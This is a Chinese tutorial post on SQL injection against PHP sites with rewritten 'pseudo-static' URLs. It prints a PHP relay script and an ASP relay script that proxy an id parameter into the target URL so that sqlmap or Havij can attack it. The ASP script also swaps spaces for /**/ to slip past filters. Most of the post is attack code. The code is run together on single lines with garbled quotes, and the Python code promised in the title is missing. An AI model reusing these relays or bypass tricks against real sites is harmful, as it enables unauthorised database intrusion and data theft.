PHP针对伪静态的注入总结【附asp与Python相关代码】

本文实例讲述了PHP针对伪静态的注入。分享给大家供大家参考，具体如下：

一：中转注入法

1.通过http://www.xxx.com/news.php?id=1做了伪静态之后就成这样了
http://www.xxx.com/news.php/id/1.html

2.测试步骤：

中转注入的php代码:inject.php

<?phpset_time_limit(0);$id=$_GET["id"];$id=str_replace(” “,”%20″,$id);$id=str_replace(“=”,”%3D”,$id);//$url = "http://www.xxx.com/news.php/id/$id.html";$url = "http://www.xxx.com/news.php/id/$id.html";//echo $url;$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "$url");curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);$output = curl_exec($ch);curl_close($ch);print_r($output);?>

3.本地环境搭建PHP，然后访问http://127.0.0.1/inject.php?id=1

通过sqlmap或者havj可以跑注入漏洞。

附录ASP中转代码：

<%JmdcwName=request("id")JmStr=JmdcwNameJmStr=URLEncoding(JmStr)JMUrl="http://192.168.235.7:8808/ad/blog/"  //实际上要请求的网址JMUrl=JMUrl & JmStr&".html"    //拼接urlresponse.write JMUrl&JmStr    //我这里故意输出url来看'JmRef="http://127.0.0.1/6kbbs/bank.asp"JmCok=""JmCok=replace(JmCok,chr(32),"%20") JmStr=URLEncoding(JmStr)  response.write  PostData(JMUrl,JmStr,JmCok,JmRef) //url,查询字符串，cookie，referer字段Function PostData(PostUrl,PostStr,PostCok,PostRef)  Dim HttpSet Http = Server.CreateObject("msxml2.serverXMLHTTP")With Http.Open "GET",PostUrl,False.Send ()PostData = .ResponseBodyEnd WithSet Http = NothingPostData =bytes2BSTR(PostData)End FunctionFunction bytes2BSTR(vIn)   //处理返回的信息Dim strReturnDim I, ThisCharCode, NextCharCodestrReturn = ""For I = 1 To LenB(vIn)ThisCharCode = AscB(MidB(vIn, I, 1))If ThisCharCode < &H80 ThenstrReturn = strReturn & Chr(ThisCharCode)ElseNextCharCode = AscB(MidB(vIn, I + 1, 1))strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))I = I + 1End IfNextbytes2BSTR = strReturnEnd FunctionFunction URLEncoding(vstrin)    //发包前对参数的url编码一下strReturn=""Dim i'vstrin=replace(vstrin,"%","%25") '增加转换搜索字符,'vstrin=Replace(vstrin,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20'vstrin=Replace(vstrin,chr(43),"%2B")  'JMDCW增加转换+字符vstrin=Replace(vstrin,chr(32),"/**/")  '在此增加要过滤的代码 //这里很关键，方便啊，把空格自动换成/**/，后面会说到的For i=1 To Len(vstrin)ThisChr=Mid(vstrin,i,1)if Abs(Asc(ThisChr))< &HFF ThenstrReturn=strReturn & ThisChrElseInnerCode=Asc(ThisChr)If InnerCode<0 ThenInnerCode=InnerCode + &H10000End IfHight1=(InnerCode And &HFF00) /&HFFLow1=InnerCode And &HFFstrReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)End ifNextURLEncoding=strReturnEnd Function%>